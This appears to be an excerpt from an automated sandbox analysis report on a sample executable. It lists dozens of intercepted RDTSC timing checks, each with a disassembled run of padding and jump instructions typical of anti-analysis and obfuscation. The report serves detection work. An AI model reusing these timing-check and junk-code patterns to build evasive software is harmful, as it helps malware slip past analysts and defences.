Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B7A6CA second address: B7A6D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B7A6D8 second address: B7A6DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B7D6DB second address: B7D726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d pushad 0x0000000e jmp 00007FC22CC1B8B3h 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007FC22CC1B8B2h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC22CC1B8B3h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B7D726 second address: B7D72A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B7D868 second address: B7D87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 jmp 00007FC22CC1B8AEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B7DA5B second address: B7DA72 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC22D01ECCCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B7DA72 second address: B7DA7C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC22CC1B8A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B7DA7C second address: B7DA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B7DBBE second address: B7DBC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B7DBC2 second address: B7DBCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B802B0 second address: B802B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B802B4 second address: B802BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B802BD second address: B802C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B11231 second address: B11242 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC22D01ECCCh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B8369F second address: B836A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B836A5 second address: B836A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B836A9 second address: B836DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B1h 0x00000007 je 00007FC22CC1B8A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC22CC1B8B2h 0x00000016 jno 00007FC22CC1B8A6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B83E7A second address: B83EB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push ebx 0x0000000f jmp 00007FC22D01ECD9h 0x00000014 pop ebx 0x00000015 pop eax 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B83FA5 second address: B84021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8B8h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FC22CC1B8B9h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 pushad 0x00000016 jmp 00007FC22CC1B8ABh 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 push esi 0x00000025 jmp 00007FC22CC1B8B7h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jnp 00007FC22CC1B8ACh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B87618 second address: B8762A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FC22D01ECCCh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B8762A second address: B87643 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B4h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B87643 second address: B87650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B87650 second address: B87656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B87656 second address: B8765A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B8765A second address: B87681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FC22CC1B8BFh 0x0000000e jmp 00007FC22CC1B8B7h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B8BD09 second address: B8BD0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B8BD0D second address: B8BD13 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B8BFF2 second address: B8C00C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FC22D01ECC6h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 jg 00007FC22D01ECC6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B8C00C second address: B8C036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FC22CC1B8A6h 0x00000011 jmp 00007FC22CC1B8B9h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B8C036 second address: B8C03F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B8C03F second address: B8C045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B8C045 second address: B8C052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FC22D01ECCCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B8C1B7 second address: B8C1BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B8C1BC second address: B8C1C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B8C1C2 second address: B8C1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B8C65F second address: B8C663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B8C937 second address: B8C955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC22CC1B8B4h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B8C955 second address: B8C95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B8C95B second address: B8C960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B92BF7 second address: B92BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B92BFD second address: B92C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B97075 second address: B9709A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007FC22D01ECD2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B9709A second address: B970A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B971ED second address: B971F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B97375 second address: B97379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B97379 second address: B9739E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FC22D01ECCAh 0x0000000f push edx 0x00000010 pop edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B9739E second address: B973AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FC22CC1B8A6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B977E9 second address: B97854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22D01ECD1h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC22D01ECD8h 0x0000000f popad 0x00000010 jnl 00007FC22D01ECEBh 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007FC22D01ECC6h 0x00000021 jl 00007FC22D01ECC6h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B97854 second address: B9785F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B97B02 second address: B97B22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B97B22 second address: B97B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jmp 00007FC22CC1B8B2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B97B3C second address: B97B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC22D01ECD2h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B97CB9 second address: B97CD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jns 00007FC22CC1B8A6h 0x00000010 pop edi 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B97E38 second address: B97E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B98105 second address: B9810B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B1E817 second address: B1E83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC22D01ECC6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FC22D01ECD8h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B9B729 second address: B9B72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B9B72F second address: B9B736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B9B736 second address: B9B76F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b jmp 00007FC22CC1B8B6h 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B9B76F second address: B9B77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B60C00 second address: B60C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B60C05 second address: B60C34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC22D01ECD1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B60C34 second address: B60C46 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FC22CC1B8A6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B61171 second address: B6117B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B61220 second address: B61224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B612F1 second address: B612FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B612FE second address: B61308 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B61308 second address: B6130E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B6130E second address: B61312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B613A6 second address: B613B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B613B1 second address: B613CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8ABh 0x00000009 popad 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007FC22CC1B8A6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B613CF second address: B613FC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FC22D01ECCEh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC22D01ECCFh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B61B44 second address: B61B53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B61DFE second address: B61E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B61E02 second address: B61E0C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B61E0C second address: B61E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B61E12 second address: B61E5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FC22CC1B8A8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 pushad 0x00000026 mov ebx, 6B61FBEAh 0x0000002b mov ecx, 38E79CF7h 0x00000030 popad 0x00000031 lea eax, dword ptr [ebp+1248B8A3h] 0x00000037 mov dword ptr [ebp+122D241Eh], ecx 0x0000003d nop 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B61E5A second address: B61E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B61E5E second address: B61E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B61E85 second address: B403F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 or edx, 474D8100h 0x0000000d call dword ptr [ebp+122D2AFEh] 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007FC22D01ECCEh 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B403F3 second address: B403F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B403F7 second address: B40404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FC22D01ECC6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B40404 second address: B40411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FC22CC1B8A6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B9BD1F second address: B9BD23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B9BD23 second address: B9BD3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B9BD3B second address: B9BD3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B9C1B3 second address: B9C1C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FC22CC1B8A6h 0x0000000a jnl 00007FC22CC1B8A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B9C1C3 second address: B9C1C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B9C497 second address: B9C4AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B0h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: B9C4AD second address: B9C4D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FC22D01ECC6h 0x0000000b jnl 00007FC22D01ECC6h 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007FC22D01ECD0h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
